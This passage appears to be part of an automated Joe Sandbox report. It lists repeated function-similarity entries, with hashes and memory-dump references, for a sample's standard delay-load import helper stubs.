                                                                  • Opcode ID: 9674dbdbef7ee2a77e14247f90b274760c3b58c8ba48bce03c6f1896c119c34b
                                                                  • Instruction ID: b00881f37b4b402357efc87b8f9922dab3e1c767e696aecfea03d4ac6740eb7b
                                                                  • Opcode Fuzzy Hash: 9674dbdbef7ee2a77e14247f90b274760c3b58c8ba48bce03c6f1896c119c34b
                                                                  • Instruction Fuzzy Hash: 40B012D125F180BC3508510BAC02E3B010DC1C3B20330803EFC05C01C1DC40BE812831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 3adf0a2a60eca7603e9cbdf971ebebd2bca2fec5e0f60a5fc545574df5efc375
                                                                  • Instruction ID: 51ac569b3b7af83f0d5b321f5dc1e3e68f5aac8200476b2ed8f81d2a15606c34
                                                                  • Opcode Fuzzy Hash: 3adf0a2a60eca7603e9cbdf971ebebd2bca2fec5e0f60a5fc545574df5efc375
                                                                  • Instruction Fuzzy Hash: 71B012E125F280BC3148520BAC02E3B010DC1C2B20330413EFC05C01C1DC407EC52831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 1e3ba585c305d31dd74540d0c1edf44a13cd2d49df003d3872b04a42dd4d9431
                                                                  • Instruction ID: 7a7cb387c082bfc791971ab7c73e410c844105e7dd0000ad6eec53b2f8b2db13
                                                                  • Opcode Fuzzy Hash: 1e3ba585c305d31dd74540d0c1edf44a13cd2d49df003d3872b04a42dd4d9431
                                                                  • Instruction Fuzzy Hash: 72B012D125E140BC3504515BAC02E3B014CC1C3B10330803EFC05C01C1DC40BE812831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 26fed456e19695f5613b30a0a294fa482ab79ae79260341acfccb5e014687bfc
                                                                  • Instruction ID: 3347c6957b5cc7e43c985ca2227a2de469e80fba3b3fdbbb15e36e57ad864dfb
                                                                  • Opcode Fuzzy Hash: 26fed456e19695f5613b30a0a294fa482ab79ae79260341acfccb5e014687bfc
                                                                  • Instruction Fuzzy Hash: 38B012D126F180BC3108510BAC02E3B014DC5C2B20330403EF806C01C1DC407E812831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: e82122676f1dff0133ff03f4111bfa36e98b8880368c7a3bf01a7e8531501fd4
                                                                  • Instruction ID: 4fcae44251831ae49724fb6257c372045c8cd0c93cdec06abed34c17b33eaed7
                                                                  • Opcode Fuzzy Hash: e82122676f1dff0133ff03f4111bfa36e98b8880368c7a3bf01a7e8531501fd4
                                                                  • Instruction Fuzzy Hash: C3B012D139E240BC3104520BAD02E3B010CC2C3B10330803EF809C02C1DC507F8A2831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 1eeedc9c6a582e6f272d5afd023069f3d521eefed324c6cabde9ae6069992c23
                                                                  • Instruction ID: ecb7c5481fa28713ddeebe8c384fe8eb0bccc1d287ef4cedbee7963779fcfb96
                                                                  • Opcode Fuzzy Hash: 1eeedc9c6a582e6f272d5afd023069f3d521eefed324c6cabde9ae6069992c23
                                                                  • Instruction Fuzzy Hash: 89B012D135E380BC3144520BAC02E3B010CC2C3B10330813EFC09C02C1DC407EC52831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 19a5548254f62c665fa35bb69daced92b7917a2dc9faa0784a92e08b3cd74608
                                                                  • Instruction ID: efe034faa9bc46f8237515b3cbbfbe510a56545edd7dc39d0d7f1d6a5f1e7ef1
                                                                  • Opcode Fuzzy Hash: 19a5548254f62c665fa35bb69daced92b7917a2dc9faa0784a92e08b3cd74608
                                                                  • Instruction Fuzzy Hash: C0B012E125E140BC3504510BAC02E3B014CC1C3F10330803EFC05C01C2DC40BF812831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 8311da9aea7891ce8c56f6dc2b9a32fd8c45ff8966436cfdbcbd0b0ca5c94ff3
                                                                  • Instruction ID: a048bc590dcd5c0b9bfca824fe7ac010d7d18f491754598b6ff26ab29bc72878
                                                                  • Opcode Fuzzy Hash: 8311da9aea7891ce8c56f6dc2b9a32fd8c45ff8966436cfdbcbd0b0ca5c94ff3
                                                                  • Instruction Fuzzy Hash: 31B012E125E240BC3144510BAC02E3B010CC1C2F10330413EFC05C01C2DC407FC16831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: a1bca005109940563e9898cacd776ce60c01fcae968928398d10c81bb27a6d73
                                                                  • Instruction ID: 864c87b186596707f661c636bef174520989dbab1537f7914369fbd79eaa0ae8
                                                                  • Opcode Fuzzy Hash: a1bca005109940563e9898cacd776ce60c01fcae968928398d10c81bb27a6d73
                                                                  • Instruction Fuzzy Hash: 05B012E125E140BC3104510BAC02E3B010CC1C2F10330403EF805C01C2DC407F812831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE1E3
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: fc58de889b58b95930c80444e1b5a46659a40e7694b60e2e1dc9792f22df4a6a
                                                                  • Instruction ID: 7382b69f2c775678db2ee242f99f3514e0c17c1844ce49568ef6e26b41511b0b
                                                                  • Opcode Fuzzy Hash: fc58de889b58b95930c80444e1b5a46659a40e7694b60e2e1dc9792f22df4a6a
                                                                  • Instruction Fuzzy Hash: A3B012E129E140BC3104510BAD02E3B010CC1C2F10330403EF805C01C2DC407F822831
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 33602ec614b0bf8af6749687544b047c1a21a720103f2d3be15a6f61f754f7dc
                                                                  • Instruction ID: b5cc1caf6dfa7e30efeaf803083f9989f60cd1056083d8f84179e531ff80b4c0
                                                                  • Opcode Fuzzy Hash: 33602ec614b0bf8af6749687544b047c1a21a720103f2d3be15a6f61f754f7dc
                                                                  • Instruction Fuzzy Hash: 0AB012E12591C0BC3304910AAC03E37024CC1C6B10330C13EF804C11C0DC405C451433
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 8d49d285f94631fa95a9230e227472e5ae288d633156527eecf6483c353dad09
                                                                  • Instruction ID: 213345bc97b17308ccdab87a4f4f95cea9f5ce369304771d2ff5581672a68cee
                                                                  • Opcode Fuzzy Hash: 8d49d285f94631fa95a9230e227472e5ae288d633156527eecf6483c353dad09
                                                                  • Instruction Fuzzy Hash: 2AB012E13591C07C3304510AAD03E77024CC1C6B10330C03EF504D11C0DC401C4A1433
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE3FC
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 96f0c9acbdaeda2b4018d13bf0d9b02a110d5cda4f63c730a3219f6f631e375c
                                                                  • Instruction ID: 6b57e7c380fa00acf77020ab825d18dfc4c85f71cf151f9b175f3a50a3a2ddd0
                                                                  • Opcode Fuzzy Hash: 96f0c9acbdaeda2b4018d13bf0d9b02a110d5cda4f63c730a3219f6f631e375c
                                                                  • Instruction Fuzzy Hash: 13B012F12590C0BC3304910AEC03E37028CC0C6F10330803EF804C11C1DC405E411433
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE580
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 446f35a3f0c0829c532d91b0f2226fd7a539097fbcbed3088cf69c398d01e4b8
                                                                  • Instruction ID: c2c313c1dc218eef29b71450582142e540995d867039cbac83febc0c6961d221
                                                                  • Opcode Fuzzy Hash: 446f35a3f0c0829c532d91b0f2226fd7a539097fbcbed3088cf69c398d01e4b8
                                                                  • Instruction Fuzzy Hash: 8DB012C23691407E3104925BAC42E37011CC0C2B14330403EF404C11C0EC440C811531
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE580
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: a41bf35dbe5b22b2f9d1e64c7c9a67f6087c75edea82d7fe8ca4c0b4101f0736
                                                                  • Instruction ID: e28b9acc06b43c07233353d4908961b1f0679467814d4de68fe466789434e29f
                                                                  • Opcode Fuzzy Hash: a41bf35dbe5b22b2f9d1e64c7c9a67f6087c75edea82d7fe8ca4c0b4101f0736
                                                                  • Instruction Fuzzy Hash: D5B012C22A91407C3104915BED42E37012CC0C2B14330423EF404C11C0EC440D821531
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00CCE580
                                                                    • Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
                                                                    • Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: a8f37a70103835f2d16d86d4001929c88148015000012a117c2602aa10c69e6c
                                                                  • Instruction ID: 6763a49c916095b590a86f2646e5abce20331b2e18c8ef4b401208f11c4587d5
